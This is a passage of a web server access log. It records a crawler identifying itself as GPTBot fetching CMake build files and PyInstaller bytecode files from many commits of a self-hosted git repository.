"/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt?display=source" [Client 74.7.227.38] [Length 11187] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" +[17/Feb/2026:16:51:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt?display=source" [Client 74.7.227.38] [Length 11214] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" +[17/Feb/2026:16:51:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml?display=source" [Client 74.7.227.38] [Length 29833] [Gzip 7.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" +[17/Feb/2026:16:51:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt?display=rendered" [Client 74.7.227.38] [Length 11064] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" +[17/Feb/2026:16:51:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt?display=source" [Client 74.7.227.38] [Length 11216] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" +[17/Feb/2026:16:51:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml?display=source" [Client 74.7.227.38] [Length 29833] [Gzip 7.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" +[17/Feb/2026:16:51:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml?display=source" [Client 74.7.227.38] [Length 29834] [Gzip 7.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" +[17/Feb/2026:16:51:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake?display=source" [Client 74.7.227.38] [Length 11862] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake" +[17/Feb/2026:16:51:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt?display=rendered" [Client 74.7.227.38] [Length 11063] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" +[17/Feb/2026:16:51:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml?display=rendered" [Client 74.7.227.38] [Length 11068] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" +[17/Feb/2026:16:51:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml?display=rendered" [Client 74.7.227.38] [Length 11067] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" +[17/Feb/2026:16:51:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt?display=rendered" [Client 74.7.227.38] [Length 11064] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" +[17/Feb/2026:16:51:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml?display=rendered" [Client 74.7.227.38] [Length 11072] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" +[17/Feb/2026:16:51:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake?display=rendered" [Client 74.7.227.38] [Length 11078] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake" +[17/Feb/2026:16:51:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/localpycs/pyimod01_archive.pyc?display=rendered" [Client 74.7.227.38] [Length 10926] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/localpycs/pyimod01_archive.pyc" +[17/Feb/2026:16:51:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml?display=rendered" [Client 74.7.227.38] [Length 11069] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" +[17/Feb/2026:16:51:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt?display=rendered" [Client 74.7.227.38] [Length 11041] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" +[17/Feb/2026:16:51:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/localpycs/pyimod04_pywin32.pyc?display=rendered" [Client 74.7.227.38] [Length 10958] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/localpycs/pyimod04_pywin32.pyc" +[17/Feb/2026:16:51:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/localpycs/pyimod02_importers.pyc?display=rendered" [Client 74.7.227.38] [Length 10922] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/localpycs/pyimod02_importers.pyc" +[17/Feb/2026:16:51:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt?display=rendered" [Client 74.7.227.38] [Length 11065] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" +[17/Feb/2026:16:51:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt?display=source" [Client 74.7.227.38] [Length 11211] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" +[17/Feb/2026:16:51:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml?display=source" [Client 74.7.227.38] [Length 29832] [Gzip 7.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" +[17/Feb/2026:16:51:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml?display=source" [Client 74.7.227.38] [Length 29838] [Gzip 7.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" +[17/Feb/2026:16:51:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt?display=source" [Client 74.7.227.38] [Length 11211] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" +[17/Feb/2026:16:51:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt?display=rendered" [Client 74.7.227.38] [Length 11065] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" +[17/Feb/2026:16:51:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml?display=rendered" [Client 74.7.227.38] [Length 11067] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" +[17/Feb/2026:16:51:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt?display=rendered" [Client 74.7.227.38] [Length 11064] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" +[17/Feb/2026:16:51:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/localpycs/pyimod02_importers.pyc?display=rendered" [Client 74.7.227.38] [Length 10923] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/localpycs/pyimod02_importers.pyc" +[17/Feb/2026:16:51:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt?display=rendered" [Client 74.7.227.38] [Length 11066] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" +[17/Feb/2026:16:51:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/localpycs/pyimod03_ctypes.pyc?display=rendered" [Client 74.7.227.38] [Length 10925] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/localpycs/pyimod03_ctypes.pyc" +[17/Feb/2026:16:51:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt?display=rendered" [Client 74.7.227.38] [Length 11063] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" +[17/Feb/2026:16:51:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/localpycs/pyimod04_pywin32.pyc?display=rendered" [Client 74.7.227.38] [Length 10957] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/localpycs/pyimod04_pywin32.pyc" +[17/Feb/2026:16:51:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt?display=source" [Client 74.7.227.38] [Length 11212] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" +[17/Feb/2026:16:51:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake?display=rendered" [Client 74.7.227.38] [Length 11109] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake" +[17/Feb/2026:16:51:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt?display=source" [Client 74.7.227.38] [Length 11213] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" +[17/Feb/2026:16:51:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake?display=rendered" [Client 74.7.227.38] [Length 11108] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake" +[17/Feb/2026:16:51:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml?display=source" [Client 74.7.227.38] [Length 29833] [Gzip 7.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" +[17/Feb/2026:16:51:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake?display=source" [Client 74.7.227.38] [Length 11894] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake" +[17/Feb/2026:16:51:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt?display=source" [Client 74.7.227.38] [Length 11211] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" +[17/Feb/2026:16:51:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml?display=rendered" [Client 74.7.227.38] [Length 11071] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" +[17/Feb/2026:16:51:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt?display=rendered" [Client 74.7.227.38] [Length 11065] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" +[17/Feb/2026:16:51:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml?display=source" [Client 74.7.227.38] [Length 29800] [Gzip 7.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" +[17/Feb/2026:16:51:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt?display=source" [Client 74.7.227.38] [Length 11212] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" +[17/Feb/2026:16:51:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt?display=rendered" [Client 74.7.227.38] [Length 11063] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" +[17/Feb/2026:16:51:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml?display=source" [Client 74.7.227.38] [Length 29829] [Gzip 7.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" +[17/Feb/2026:16:51:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/localpycs/pyimod02_importers.pyc?display=rendered" [Client 74.7.227.38] [Length 10953] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 